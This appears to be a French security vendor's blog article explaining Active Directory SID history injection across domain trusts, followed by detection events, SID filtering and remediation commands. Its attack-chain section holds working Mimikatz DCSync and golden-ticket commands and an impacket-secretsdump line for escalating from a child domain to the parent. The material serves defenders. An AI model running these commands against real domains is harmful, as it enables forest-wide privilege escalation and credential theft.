Que sont les Attaques de Confiance Active Directory ?
Les relations de confiance AD permettent aux utilisateurs d'un domaine de s'authentifier auprès des ressources d'un autre. Dans les forêts multi-domaines, les confiances sont l'épine dorsale de l'accès aux ressources inter-domaines. Mais elles étendent aussi la surface d'attaque : un domaine compromis peut parfois être utilisé pour attaquer des domaines de confiance — y compris la racine de la forêt.
L'attaque de confiance la plus impactante est l'injection d'historique de SID — utiliser le hash KRBTGT d'un domaine enfant pour forger des tickets Kerberos avec des attributs d'historique de SID revendiquant l'appartenance au groupe Enterprise Admins du domaine parent.
Comment ca Fonctionne
Quand un utilisateur s'authentifie à travers une confiance, son ticket Kerberos inclut un PAC (Privilege Attribute Certificate) qui liste ses identificateurs de sécurité (SIDs). Le domaine cible utilise ces SIDs pour déterminer les appartenances aux groupes et les droits d'accès.
L'attribut SID History permet à un compte de porter des SIDs d'un domaine précédent. Si un attaquant peut injecter des SIDs arbitraires dans l'historique de SID d'un ticket forgé — spécifiquement le SID du groupe Enterprise Admins dans le domaine parent — le domaine cible accordera un accès de niveau Enterprise Admin.
Cette attaque nécessite :
- Le hash
KRBTGTdu domaine enfant (pas du parent) - Le SID du groupe Enterprise Admins dans le domaine parent
- Une confiance bidirectionnelle ou parent-enfant entre les domaines
La Chaine d'Attaque
Etape 1 - Compromettre le Domaine Enfant
L'attaquant obtient d'abord Domain Admin dans un domaine enfant — souvent un environnement moins sécurisé utilisé pour le développement ou les filiales régionales.
Etape 2 - Extraire le Hash KRBTGT du Domaine Enfant
lsadump::dcsync /domain:enfant.corp.local /user:krbtgt
Etape 3 - Enumérer les Informations de Confiance
Get-ADTrust -Filter * | Select-Object Name, TrustType, TrustDirection, SIDFilteringQuarantined
Get-ADGroup -Identity "Enterprise Admins" -Server corp.local | Select-Object SID
Etape 4 - Forger le Ticket Inter-Realm avec Historique SID
# Mimikatz — forger un ticket avec le SID Enterprise Admins dans l'historique SID
kerberos::golden /user:Administrator /domain:enfant.corp.local /sid:S-1-5-21-ENFANT-SID `
/sids:S-1-5-21-PARENT-SID-519 `
/krbtgt:HASH_KRBTGT_ENFANT `
/ptt
Etape 5 - Pivot vers le Domaine Parent
impacket-secretsdump -k corp.local/[email protected] -no-pass
Détection
Event IDs Windows
| Event ID | Source | Ce qu'il faut surveiller |
|---|---|---|
| 4769 | DC | Demande TGS inter-realm — ticket émis pour une ressource dans un autre domaine |
| 4768 | DC Enfant | TGT demandé avec des attributs d'historique SID anormaux |
| 4672 | DC Parent | Privilèges Enterprise Admin accordés à un compte inattendu |
Filtrage SID
Le filtrage SID empêche les attributs d'historique SID d'être honorés à travers les frontières de confiance :
Get-ADTrust -Filter * | Select-Object Name, SIDFilteringQuarantined
# SIDFilteringQuarantined = True signifie que l'historique SID du domaine de confiance est ignoré
⚠️ Attention : Le filtrage SID est désactivé par défaut sur les confiances parent-enfant au sein de la même forêt. Cela signifie que la compromission d'un domaine enfant peut mener à la compromission du domaine parent.
Remédiation
💡 Action Rapide : Auditez toutes les confiances externes et de forêt pour
SIDFilteringQuarantined = False. Activez le filtrage SID sur toute confiance externe qui ne nécessite pas l'historique SID pour des migrations légitimes.
1. Activer le Filtrage SID sur les Confiances Externes
netdom trust corp.local /domain:partenaire-externe.com /quarantine:yes
Get-ADTrust -Filter {Name -eq "partenaire-externe.com"} | Select-Object SIDFilteringQuarantined
2. Revoir et Supprimer les Confiances Inutiles
Get-ADTrust -Filter * | Select-Object Name, TrustType, TrustDirection, Created | Sort-Object Created
# Supprimer toute confiance sans justification métier actuelle
Comment EtcSec Détecte Cela
EtcSec audite toutes les relations de confiance dans votre environnement AD et identifie les mauvaises configurations pouvant permettre une escalade de privilèges inter-domaines.
Les vérifications liées aux confiances incluent la détection des confiances externes sans filtrage SID, des confiances bidirectionnelles qui étendent la surface d'attaque, et des paramètres de sécurité faibles sur les confiances de forêt.
ℹ️ Note : EtcSec audite toutes les configurations de confiance automatiquement. Lancez un audit gratuit pour revoir votre posture de sécurité des confiances AD.
Articles connexes : Golden Ticket : Les Clés de Votre Domaine | Chemins d'Attaque Active Directory
